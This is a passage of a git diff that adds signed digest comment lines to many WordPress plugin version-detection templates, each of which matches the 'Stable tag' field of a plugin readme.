4a0a00473045022008a1ed5098842e4115ed3693dd56bc02c43c7e5dafbcf576bf20772b571c4a0c022100d6c71a806957951907e79f5418d15801b0fe8190dca23cd0e504b240f91956df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..40950e194c 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200467f1be9bfd7510470e4aef97cd20519c309afa17798d8a30ecc805d902cd90022100971f8dadf6db3697c2a3aa2d8a6f8b0855c823117fb2bf60274d21bcd29d6724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..532171ca59 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207df06e4e23248673905d7e56191421a08031515e84b4f779531840e8d5cbc0c902207ad10b8f76227a524a4e9c1a443a7face658ae0cfa1b42e5a4b5b0f898c3afcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..4b99fd7ead 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d93eb1a3ac9803236f261cfe779bbaa1bc46eb8f835653a5792ee44e4f8e412f022100fd5ed8b17d56988aaf72ebb90e1194585017fc13937d1461518c128153bd541b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..14d3a3d0e5 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220665d517c43ce76cb35ae8902fac72898238abaf43b401b53809d7731822b33c0022100de408e4da79feb826a156950918ef0f420ff80d333acb345a0b5488d473ecfbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..0d84f1ca05 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201201951cf231f54f417cbb68acb52c871373c9b3120e9a5b2106c23105104a940220082842f8f6d93cac4a1f649ab77b6e4236de24f2684996c24ec03ec36123e0fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..4534943aca 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f7efced0d7ddadaf5f8df14390447fafb5fa36919148ec574889bc4451941a26022100c032cd486deea4520b870730e6727a9513d8ffd40c66b96078b55573b14aa5a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..bfd2003933 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022043acb35203a975c4ca61f2abac211b1a289170042d057591bc5512e07ff3d8c50221009ec6663c7ea09962f71e3f70f13f0297d6314652f70e3572b611a48806c4a655:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..664930b802 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a104bc88522199c180e460592a2f926128e689342c3dcc179c092e4f7b9b945d022100aa3ebc4664aa32bd509fb9abbb96dcea78b55683f93976d571eee2a429e2ebb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..c0fd172543 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ab05262a4f1ef7e41705f9eeefba6a57f10b6b0a7014ea3517a69ef01f00dfed022037dafec63035d90c17db4c542d2f89f4295a9d7efc4640b20bf3f867a7b8cbf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..eef031d261 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009b8eff24b449ee024a48a2bf8b33eae86bef0429fbabe2ab9f6d63da76ada9b30220309f2f5abd4b89c21b43eb5b8ecb75da7a94e8986546419bd499a76c15f12f9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..03dc7e5696 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201ae49fc51916eae64f83b57460914a10fe43ddb24a52905735fc150644c335c9022100bea9fa22fd91fd8c757dafb8ce430b4599f2fdf6a5be994c1c47d58fd79cc420:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..9ae8be7594 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220018d407b47c8d33821aee327005a2e1843e7d33fc90929fa63b2459d2132bf980220599a9db8762ed8f6b7af8d67e600ef78b54a9b6cb90e126fd89dbe568fee55fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..7c69f99546 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100903884f0025d2a20e869acd66bdf1fe45addc4c3a1aea743b3d6ce2b369d5571022008a1b6f199d97e74202acbf66c387e9895d4f17498387336f78821ee4e67fb8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..2814a80450 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220771c3dd5412940c9c698e9f9c4e8df677bab8555710469486991b34b70528d0f02210099fabe68c2fa2c4394ab5ac04893879624cb47de6b376d4945641cbec7494b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..7064fbf3d7 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210089d915bfbcdf3da1ba98c4560fd20f8e13c6d9241129fd6103870d30b286a4cd02204ccedbf48248d8ffbe1aca0b37b499dd5810b4a9250bc9004a11fa1bee721179:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..f29ae2a9ba 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dfa0b4e45fe50ec849680e10df11906663e3b7d4064bf9c59f1902984217f812022075583fabc33eb0b4530873d1a6885e4e4c5ef52eb070cd77b9d0e8a28ef4d88f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..8d2614b99c 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022061e98f2297976cf1212f91fdd03141be0151f3e7b0788a9805e0fafdc59ab1e402204e1c028c869bff19efd94a18c2d6307fdd4cceed2f20e645349fdba6551623e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..e127756ea8 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f1919f8c8a667a9f3eb119d12830c6cb187f5970834fd8ff68ebe4b681e68cc5022100aca87e6d5e6512dbdaf71f6f16fdb9bc649fd7eabc6c347bcb3559e2fbfbc869:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..561ec2e1d0 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ae519fb974e4680a3f37590eb29fd6a01d58168f011f8f8219ed7230ada6292c022100c7f95171dd13a53365725968f3e22b31135039e333582a4241b49098bf9617c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..84fb0fa1e9 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d0d5aecda2d6f7b24b63453e5be0755fa467079315f1c5aaddcbd8a19622af6d022100cc938b3377dcefb5f0af311fa9d7c1bd9f05b25f527cf7a292f66e9150bc6a75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..d0dba2da1d 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e96966c22b6dab13f0bd6b584cd087ed3a01521f86bc2e5a469ca792a4f7a27d022100a88e8cbb205148524a64a71b9d556d28076def773faddc282c9e2a77748b8bf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..d62357d629 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f77328c56c32f770bbe823b97386d3737bffaba9f8169ff95668c054fa8dfef5022019c8424c2627258b4e17cae96caba00ff1b64752b8d328b3c7c28943a1bb24e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..d6555e03c6 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220457e0a614bca7ffd5c651a04537bf4cbada945f804907c54fbbd9640070bbded022030304bac277a8bfd4f157f32072fe43c00d2d727781f1c6af7b5e4efd0a84e5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..1dea5def2b 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022047487239b68a4d25d5980c5b308003cfed8d1807437ef06d5c32f02e147bfef6022100dd8e676a117df5d8b6f5340f13bf5d0c4f52742896125be035e3ad1f9df37300:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..d09d6e43b1 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b24b848aa69bfbee04c97aef347134eda09d9c287f75fb588427603326843285022100b50522618552bf33de4299930cbe6c41b80759a51d551dde05cbabb8eb938df0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..4691cf09a6 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220287ca612a5a2403a27594d02cbfd187a7deb1a84566eef9640f9d5d351ba7485022100e7aee3491fdbdc081c04811790e30cf5bc3300a15d69dc7dcee02b55a66febfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..278aac9296 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203b2c3c53f4bc4d199d986787d164f66d1ea17b9697915a112c0d13434b5e70f0022100b7e8fde40bfa99be3727c59d0010f8ab119ac9bb4016a42ec0e627acc116ad63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..17b5bbcc60 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022052ac4287e8079fbc31694ee7b24c8834d44b65d195038ce5204e892ab0b89572022100fa35ccd0e3b76cc79409c83296e64a1f82b4dea777138b4173428559c3377a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..7e0423c7b6 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022025d28245fece598bdfa0ba6598a722722a2583f012e5f3932d6a2749bd2f747202204e3d809a0f1c67a4b60a80e8a9d7b044fed546f92bfd91a497febf0ef180d1ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..400b7824c1 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203fa958edf0d4d70b7ff0cc3b6dd37426dbaf92c1f5641eab4940f10bb8171e8e022100eaca8886b65e0acd8832489105884ff8751103cf74f2d49aa4793c4ff13a7450:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..bae8cc3231 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100df4934031d6390d801e349543b58c238a419bbb059c33c484ba8fd16154adf4f022100ad2f2fb60ad30aac4194b4b261a0705376ff3bf18bd5ef99a187ad60929e4edb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..9ea965e516 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220101cd707f9dd9945aa240f3bce825f9c1084761df950b566bb590d91dffa34e302206a0e9a3c62e849d6436dd12a3b7463574f8fa226d39bc01ac7ebe60335d23787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..5e3972a09d 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206a025d2dc6786ebeb283d64b038a811c6253bf05cfb9a4304d691711d41b84b5022100ae05320d54d44802aa1e3550cd6a3bddcd0b6499983da98416cfb9f82c9a8a8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..e234495d82 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207d5dbbf901cc20558893c29672f666f52093c2f2de84aa859c3f5eeb2c01edfa022021fe7946d5ccf4f2e8a6a5196639de903b74b128718e7e93db20178ae5538290:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..2a094b8b9f 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205f4d3f2230655dd7139091bd28d69469390f9259cdcefde377569a2c260a0ace02206597d9bb965f0d23822373f46c43d504cee3c27e21d8928b28f1195557eb5d32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..849e36839d 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b6e1978be30c8a264da990cb740aa3b2c249756b4f50a2b2a961ad6f0cc0eeeb022044ce3322894a1c56e6b8d5c2cf2a6ae3f78097afb4c794a8e1a22df273b24584:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..83d6986c0c 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202eff2d9ba2151ac6969607df5fc76719708768e122ac068492ff6cf332bfe846022100fca646ec79515eb0bad61d52ef567a22254ff9875b83d2ac011dd2e202bb9a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..bddb3693fc 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204b15322b3a80f61633d26cb60f18b30e20c12b7677c1e8661823e233633dff0a02207b3d4d6defec0f70994cff349f1bff928fcadcc9f12460844e8187529c0dfe14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..b621489a72 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220370139880f15b60c186c42f90d8fde3d71f1dbf1d8803dd4fdb65fda67a53198022100f2bbe9bc7885aec4355fef28efb58901cef973741215899cbce2e3da6db551fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..a92fbf4bc0 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200b735646732b7b7f509f6b810739faf1fcc34668452f2652847dec592261f7be022100f106805e1e3a6ca0558bd08bc9ed07022fa5c8d23f60c7740136e2a138a02728:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..c25d2e1dd3 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022055b8d6697ae7f770e32c480baf995a9ef4fbf5d9123f4d8affd26084827d8a610220780ecc087e1d1acfb8d65758305421b69a6e10fed6a3e0129fad4a73ca99a5c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..ca62340f18 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204d5e71e65d669079ce596aa6b268758f04b91d613e190636161d68b7a417953102201a9d5aeaa14436df8a0fbcb8a7043ac471d0c2015c0d1831c5ef5c9f5757ff97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..26d219c536 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aa636b948cd82168c2b37f4ec21c241b24d295870dcecb661847bbf33584edd402201530c66874af59ecbc4508ab1ce848dadc651e4212f20b6cf0faebb60b9fc3f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..9c49c1641a 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203b875576d79b72ffe0a86c2e1999ea86ad6232dd6a3905520dae2ae14bf0d18702205ef228ac4b4009617a650b49a6cc37baecc49d7b331b66d469a858e6d4e0ab3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..afaa92e240 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b10bd6b5578293d0345cb337f079df38330305cb2bee4efbd3a4a301e5e743b002202ccf0b6a09f4990034aa0fb7129d0cc1264fd31fc3c0e948cc34df25b17d8e90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..a39f818e58 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200317184a835ec22cfe0c571849d5d25095f1ba91896fc355b318fc7a91dd1a2402210096075d35b060c392b4bfc17f4d81b47af6553d987291e1a3b02e5602bca3d33e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..5191564f49 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 